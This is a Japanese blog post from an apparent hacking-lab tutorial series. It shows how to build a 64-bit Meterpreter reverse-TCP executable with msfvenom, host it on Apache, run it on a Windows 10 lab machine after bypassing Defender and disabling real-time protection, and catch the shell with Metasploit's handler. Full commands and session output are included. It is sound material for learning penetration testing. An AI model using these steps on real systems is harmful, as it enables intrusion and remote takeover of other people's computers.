Metasploit で Windows 10 のシェルを遠隔操作する

Windows 10

Windows 10 の導入が完了したので、ハッキングを行っていきます。まずは Metasploit を使用して、Windows 7 に実施したものと同様の攻撃を行っていきましょう。

リバースシェルのペイロード作成

WIndows 7 と同様の方法でペイロードを作成します。Windows 7 での作成は以下記事に記載しています。

実行コマンドとしては以下です。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil2.exe

Windows 7との差異としては、64bit 向けかどうかです。

Windows 7 での作成コマンド

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe

それでは実際にやっていきます。

msf5 > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil2.exe
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil2.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /root/Desktop/evil2.exe
msf5 >
msf5 > ls /root/Desktop
[*] exec: ls /root/Desktop

evil2.exe evil.exe file.csv vbox
msf5 > 

コマンドの実行により、デスクトップに「evil2.exe」が作成されました。

ペイロードの公開

こちらも Windows 7 と同様に Apache に公開します。

Apache の公開サーバディレクトリに「evil2.exe」を格納します。

root@kali:~# cp /root/Desktop/evil2.exe /var/www/html/share/
root@kali:~# ls /var/www/html/share/
evil2.exe evil.exe
root@kali:~#

Windows 10 でペイロードをダウンロード

Windows 10 のブラウザから「http://10.0.0.2/share」にアクセスして、evil2.exe が公開されていることを確認します。

※接続できない場合は以下コマンドで apache2 を再起動してみてください。

root@kali:~# service apache2 restart
root@kali:~#

上記ページから、evil2.exe をダウンロードします。

すると、Windows Defender によって evil2.exe が削除されてしまいました。

Windows 7 ではこういったセキュリティはありませんでしたが、Windows 10 ではセキュリティが強化されています。

ダウンロードするため、Windows セキュリティから「デバイスで許可」を選択しましあた。そうするとダウンロードできるようになります。

Kali でリバースシェルを待受ける

以下のように、Kali側でリバースシェルを待ち受けます。

なお、「ハッキングラボ」にあるように、exploit にオプション「-j」と「-z」を付与してます。

-j : モジュールをジョブとして実行します。
-z : バックグラウンドでセッションを確立します。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.0.0.2:4444 
msf5 exploit(multi/handler) >

ペイロードの実行

Kali 側が待ち受けている状態になった場合は、Windows 10 でダウンロードしたペイロードを実行します。

すると、一瞬セッションが確立されますが、すぐにセッションが閉じられます。

msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.103
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.103:49937) at 2020-03-09 10:23:03 -0400
[*] 10.0.0.103 - Meterpreter session 2 closed. Reason: Died

Windows 10 のリアルタイム保護が邪魔をしている可能性が高いので、リアルタイム保護を無効にしてみます。

無効後、再度 Kali 側でセッションを待ち受け、Windows 10 でペイロードを実行します。

そうすると、セッションが確立されました。

msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.103
[*] Meterpreter session 4 opened (10.0.0.2:4444 -> 10.0.0.103:49969) at 2020-03-09 10:40:19 -0400

msf5 exploit(multi/handler) > sessions 4
[*] Starting interaction with 4...

meterpreter >

ここまでくれば、後は遠隔操作が可能な状態です。

Windows 10で行うことで、セキュリティソフトがあると容易に侵入することは難しいことを学びました。

次回以降は、遠隔操作を行っていきます。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました